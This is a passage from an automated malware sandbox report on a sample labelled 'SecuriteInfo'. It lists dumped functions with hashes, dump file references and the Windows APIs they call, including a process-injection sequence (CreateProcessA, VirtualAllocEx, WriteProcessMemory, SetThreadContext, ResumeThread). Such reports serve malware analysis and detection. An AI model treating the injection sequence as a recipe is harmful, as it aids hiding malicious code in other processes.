                                            • Instruction Fuzzy Hash: 3B11AC30B002155FCB18AFAC94996BFBAE6EF88610F500468E546AB3C1CF705E4983A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TJbq$Te]q
                                            • API String ID: 0-3147309840
                                            • Opcode ID: 0e495248fd85881d21d5c6d2f8e100525d8196384f90800f60dfbcbecadd7335
                                            • Instruction ID: 2bd18f102e7bfd5683e5b1dea5d990905486eb52af3f9bf9c8ecb6992c85ffba
                                            • Opcode Fuzzy Hash: 0e495248fd85881d21d5c6d2f8e100525d8196384f90800f60dfbcbecadd7335
                                            • Instruction Fuzzy Hash: BD11A230B002155FCB18AFB8D4556BEBBB2EF88610F50046DE546AB3D1CF759D49C7A2
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,6CEA6890,?), ref: 6CEA8BDD
                                            • LeaveCriticalSection.KERNEL32(?), ref: 6CEA8C23
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave
                                            • String ID:
                                            • API String ID: 3168844106-0
                                            • Opcode ID: d955e7eb40754b0913a8f735ba06a5a902c48ff748cdc1366487b076acad6f08
                                            • Instruction ID: 7d27bc3358d7ac14061b2c87f7f370d8f8941da5af656c30c62166b537b3a6ac
                                            • Opcode Fuzzy Hash: d955e7eb40754b0913a8f735ba06a5a902c48ff748cdc1366487b076acad6f08
                                            • Instruction Fuzzy Hash: B001BCB1705104AFC750DFA8C88099AF7B8FF8C204720426AE905CB700DB32ED51CBD1
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071123CF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: bd218739705b63e717ebe6ce4eee4d791f8e374336df831dd7d07018a46aec89
                                            • Instruction ID: 63cdc6df9223a1b80980853dfed2c528a4b3cae80e823a4ce6f07c531d85dc23
                                            • Opcode Fuzzy Hash: bd218739705b63e717ebe6ce4eee4d791f8e374336df831dd7d07018a46aec89
                                            • Instruction Fuzzy Hash: 93B116B0E00259CFDB15CFA8C8457EEBBB2FF09304F149169E859AB290D7749985CF41
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071123CF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: f26c01551de30173f2fa2342f6d5a6e272bf53349a2c223868884375d0d113a0
                                            • Instruction ID: fd3932e32f415b2a69a31492cd4d983936f9cf6c7bd1d85e0fe4e69fdd27406d
                                            • Opcode Fuzzy Hash: f26c01551de30173f2fa2342f6d5a6e272bf53349a2c223868884375d0d113a0
                                            • Instruction Fuzzy Hash: 31B105B0E00259CFDB15CFA8C8457EEBBB2FF09304F149169E859AB290D7749985CF51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _malloc
                                            • String ID:
                                            • API String ID: 1579825452-0
                                            • Opcode ID: fca23fa3ba556f07a8b988ec60a27fd8658a0a842c2ddd2f96af9101755019ce
                                            • Instruction ID: 0136ca2b4f9bdd130b8b017ffe2eba387c4552eca4c1bfaaa611c230980c19c0
                                            • Opcode Fuzzy Hash: fca23fa3ba556f07a8b988ec60a27fd8658a0a842c2ddd2f96af9101755019ce
                                            • Instruction Fuzzy Hash: 5C81C4F19097808FEB209FA4898176EB7F0AF41308F3449BDD159ABB91D7B584498BD3
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071128F5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: e73792d0059a0387d36f6110bcb2757ffce108a526ded451d4fe08e6e7d6244b
                                            • Instruction ID: 472c3e45675fe88619f4dc6c54a6bb592eaa7c6c2d5c738d16eca237c61f6c2d
                                            • Opcode Fuzzy Hash: e73792d0059a0387d36f6110bcb2757ffce108a526ded451d4fe08e6e7d6244b
                                            • Instruction Fuzzy Hash: 9D4159B5D002589FDB00CFA9D984ADEFBF5BF49314F14902AE818BB250D375A945CB64
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071128F5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: a8870b26563c3e268c93377f59e2a7777dc7b3977d298ece84a8d892e1999ee5
                                            • Instruction ID: 988e97b8f646abdf904b075a027000fe25db5bb4de253b862e396ffcba89081d
                                            • Opcode Fuzzy Hash: a8870b26563c3e268c93377f59e2a7777dc7b3977d298ece84a8d892e1999ee5
                                            • Instruction Fuzzy Hash: 704166B5D002589FDB00CFA9D984AAEFBF5BF49310F24902AE818BB250D375A945CF64
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071127AC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 34a836f03e98c3386d269763b6cce0cc589762e2e93abfb0024973cb9a41a26a
                                            • Instruction ID: 67cf2c10b91f4c1cd3aa67d339128234da56b28b8bcff1957c5810108f571620
                                            • Opcode Fuzzy Hash: 34a836f03e98c3386d269763b6cce0cc589762e2e93abfb0024973cb9a41a26a
                                            • Instruction Fuzzy Hash: 594166B8D012589FCB10CFA9D984A9EFBB5BF19310F24942AE818BB210D335A941CB64
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071127AC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 77754594c8b998c0bb09b1f740c6f93469978c9f47877010b58b75ebaba7d99b
                                            • Instruction ID: 08cbaccc0d214c3db2688a280445b2551ae66e5ee6087e265b56b35c15059abf
                                            • Opcode Fuzzy Hash: 77754594c8b998c0bb09b1f740c6f93469978c9f47877010b58b75ebaba7d99b
                                            • Instruction Fuzzy Hash: E63155B9D012589FCF10CFA9D984A9EFBB5BF19310F14942AE818BB210D335A941CB64
                                            APIs
                                              • Part of subcall function 6CEC2820: _malloc.LIBCMT ref: 6CEC2871
                                            • std::tr1::_Xweak.LIBCPMT ref: 6CEA71D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Xweak_mallocstd::tr1::_
                                            • String ID:
                                            • API String ID: 4085767713-0
                                            • Opcode ID: 6016ad457b092b87b3217fe3303ac86a3d144d5c83791e0de427226055831301
                                            • Instruction ID: 0b9eb37dbe970a30427a05a38e3bd5f1e187f9cd6a706196598d38963d410902
                                            • Opcode Fuzzy Hash: 6016ad457b092b87b3217fe3303ac86a3d144d5c83791e0de427226055831301
                                            • Instruction Fuzzy Hash: 7031A5B5A0434A9FCB10CFA5C8C0AABB7F5FF48208F20861DE8559B745D331E906CB50
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 0711268B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 7e93fdb59488141937b7667b563f84a70e5c246c0700a3f8ca10fc55cfed343d
                                            • Instruction ID: ee79b16b26b647b1be01caac3a8e5e7221b00b79529f0b4dc9949bdcc0e754f2
                                            • Opcode Fuzzy Hash: 7e93fdb59488141937b7667b563f84a70e5c246c0700a3f8ca10fc55cfed343d
                                            • Instruction Fuzzy Hash: 4931BAB4D01258AFCB10CFA9D584ADEFBF4BF09310F24846AE818B7250D339A944CF64
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 0711268B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 73d2ff708cd1f462d14f74a154eac647255a78a36ad8c27574b58a253d267850
                                            • Instruction ID: e8cd2686c8f798ac540a43cadbc4b95af876f95e9085463a669ec4b49041ef7a
                                            • Opcode Fuzzy Hash: 73d2ff708cd1f462d14f74a154eac647255a78a36ad8c27574b58a253d267850
                                            • Instruction Fuzzy Hash: 3E3199B4D012589FCB10CFA9D584ADEFBF4BF09310F24942AE818B7250D778AA44CF64
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 07112A4D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: d3d42234be4212a5cfc17bc9817496d0b66a8d6402a09dd6004bde1c12b328a6
                                            • Instruction ID: 088d1020b6e36a2844d09884fb5d2d40ccfc0d6c75ce49a5e175fa5c052fac6d
                                            • Opcode Fuzzy Hash: d3d42234be4212a5cfc17bc9817496d0b66a8d6402a09dd6004bde1c12b328a6
                                            • Instruction Fuzzy Hash: E73199B4D01258AFCB10DFA9E984A9EFBB4BF49310F14902AE818B7350D774A941CFA4
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 07112A4D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 1cae945f8d34c182684fe812ed888bf1c3902bf5dcdd6c4afee9351095d20561
                                            • Instruction ID: 1a23badc02587d08d805a2942d6bc5f0dbd9c3f01dbcd555dfcba94083e48e74
                                            • Opcode Fuzzy Hash: 1cae945f8d34c182684fe812ed888bf1c3902bf5dcdd6c4afee9351095d20561
                                            • Instruction Fuzzy Hash: DE3189B4D012589FCB10CFA9E584A9EFBF4BF49310F14942AE818B7350D775A941CFA4
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • SysAllocString.OLEAUT32 ref: 6CEBEA8D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: AllocString_malloc
                                            • String ID:
                                            • API String ID: 959018026-0
                                            • Opcode ID: 86f756117719c4d73482e241b04c595c3f95628dcb8917a40a44a4cb647318cc
                                            • Instruction ID: 2ff9b8f6d1fb34281812fac156bf93e8016dd04786aa8b4a65231d0278427150
                                            • Opcode Fuzzy Hash: 86f756117719c4d73482e241b04c595c3f95628dcb8917a40a44a4cb647318cc
                                            • Instruction Fuzzy Hash: F3019271905B55EBD311CF94C900BAAB7F8EB05B28F21435AEC65B7B80D7B599008AD1
                                            APIs
                                            • __EH_prolog3_catch.LIBCMT ref: 6CEFE8DC
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: H_prolog3_catch_malloc
                                            • String ID:
                                            • API String ID: 529455676-0
                                            • Opcode ID: 17381d68f601cb1386cc00e774ed88038bd6e13ab8ef608b048a69616edfd785
                                            • Instruction ID: 6f0bc17617864ac4b1825d5d435fb2353785c2266ae97e88552273ced612014d
                                            • Opcode Fuzzy Hash: 17381d68f601cb1386cc00e774ed88038bd6e13ab8ef608b048a69616edfd785
                                            • Instruction Fuzzy Hash: 4FD05E3161820897CB51BF988405BAD7BB0AB81325F700069E4187BB80DA719A0AC79A
                                            APIs
                                            • ___security_init_cookie.LIBCMT ref: 6CEFA510
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ___security_init_cookie
                                            • String ID:
                                            • API String ID: 3657697845-0
                                            • Opcode ID: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
                                            • Instruction ID: 984191392ad4ead38540174fa55419828049f4c6dce1d6bc3584528df4a0cbf3
                                            • Opcode Fuzzy Hash: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
                                            • Instruction Fuzzy Hash: 13C09B351443489F8B04CF10F440CDE3775AB94234730D11DFC681AB509B319966D560
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82db8a2b20fc54f9637faaa3550691063f7a1983508af9fca88c62c47c3e0b30
                                            • Instruction ID: 4484d90295b75ff51959e54c9862a77b95cba8a9fd59a329fd51212e053388e3
                                            • Opcode Fuzzy Hash: 82db8a2b20fc54f9637faaa3550691063f7a1983508af9fca88c62c47c3e0b30
                                            • Instruction Fuzzy Hash: 4251C874E01219CFCB04DFA9D984AADBBB6FF88300F148529D809A7365DB359D4ACF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 705ccafd9eeef34fb644d9e84b6c603eef182ba31bfe0de889a7882c53279a48
                                            • Instruction ID: db680c3b8317d3d4116eebda261096bb5613d173fab004466ebb157687923cc4
                                            • Opcode Fuzzy Hash: 705ccafd9eeef34fb644d9e84b6c603eef182ba31bfe0de889a7882c53279a48
                                            • Instruction Fuzzy Hash: 9551D874E00219CFCB04DFA9D984AADBBB6FF88300F148529D809A7365DB34AD45CF51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1d2da5975b06286f08af5a4994a7034df810a8b99c6bcbaac0074b77057e036
                                            • Instruction ID: 3cf477ebb56a52968dba8b82257cde2f10250a5ac2fa4f811a684649cf5da25f
                                            • Opcode Fuzzy Hash: d1d2da5975b06286f08af5a4994a7034df810a8b99c6bcbaac0074b77057e036
                                            • Instruction Fuzzy Hash: 602105B4D05208CFDB04DFA9D8446EEBBB6EF8D301F10846AD50AB3250EB755A89CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8ffddb4ac9c7dafb7f61ca207bd5e33944aa0d1990a1463be8d3c2ba5916c101
                                            • Instruction ID: 7d91b4c0739dff26118de8d31d37b12459f07eb134f607dc71c151982f83e310
                                            • Opcode Fuzzy Hash: 8ffddb4ac9c7dafb7f61ca207bd5e33944aa0d1990a1463be8d3c2ba5916c101
                                            • Instruction Fuzzy Hash: 7621F271504244DFCB05DF14D980B26BB76FF98314F28C569E94D1B256D33AD80ADBB2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4cbf1adafc4e2d22b671631f9977d255d02474b9eb9d218e3e7d285aa9df12f8
                                            • Instruction ID: cbd88d61521ad36dba24fd1daae4d31991c767039c7a42ebf6470aecde60b04b
                                            • Opcode Fuzzy Hash: 4cbf1adafc4e2d22b671631f9977d255d02474b9eb9d218e3e7d285aa9df12f8
                                            • Instruction Fuzzy Hash: 1F21EF30A102068FCB54DF68C96069E7BF6AF84300F21CA19D516CB398DF34ED42CB81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db49db7fa6f2316c19c6f388fe958e3792c47995f8c4474ee50f798fb05fb215
                                            • Instruction ID: 0d722652727447ae4e07d0c99c8475d0fb725d8e518956e1b112f8f771741300
                                            • Opcode Fuzzy Hash: db49db7fa6f2316c19c6f388fe958e3792c47995f8c4474ee50f798fb05fb215
                                            • Instruction Fuzzy Hash: 0A21F2B1508344DFCB05DF24D980B26BB76FFA4324F28C569E90D0B256D33AD806D6B1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a56ed77c89f19a887012d558364f60a68aa9a0ce34c8bfdf89a4fe72b2f607c2
                                            • Instruction ID: 378b15b1f75e6bd5432a523d8f3233b9059f4c3ba2dd8daa72eaf8b0ca3d2f33
                                            • Opcode Fuzzy Hash: a56ed77c89f19a887012d558364f60a68aa9a0ce34c8bfdf89a4fe72b2f607c2
                                            • Instruction Fuzzy Hash: 71210171504200EFDB14DF14D9C4B26BF76EF84328F24C669D84D0B255D33AE846C6B2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 49dabd77e4610cc40c54a33eca3144912aea451e85bb0d40ee909d54066a2a91
                                            • Instruction ID: b59302c9a3bfc0b0db23461915a6787c79b34e938ae03cd21db544fef99d61ed
                                            • Opcode Fuzzy Hash: 49dabd77e4610cc40c54a33eca3144912aea451e85bb0d40ee909d54066a2a91
                                            • Instruction Fuzzy Hash: 8D21E574E0420ADFCB04EFA9D5846BEBBF6BB48304F148569D418A7355DB349981CF91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7c473f4e7b3201458dd95f2738578505d4c203c87b0857b21069be246f3f9e7
                                            • Instruction ID: 67dfd275cbaf9c6b4023d1ca3cb7d5fb4681265788c8315affa37a9301db1588
                                            • Opcode Fuzzy Hash: a7c473f4e7b3201458dd95f2738578505d4c203c87b0857b21069be246f3f9e7
                                            • Instruction Fuzzy Hash: 2F118F303082545FC745EB68D8A8D6E7FF9EF8A21074540EAE549CB3B3DB219C05C761
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
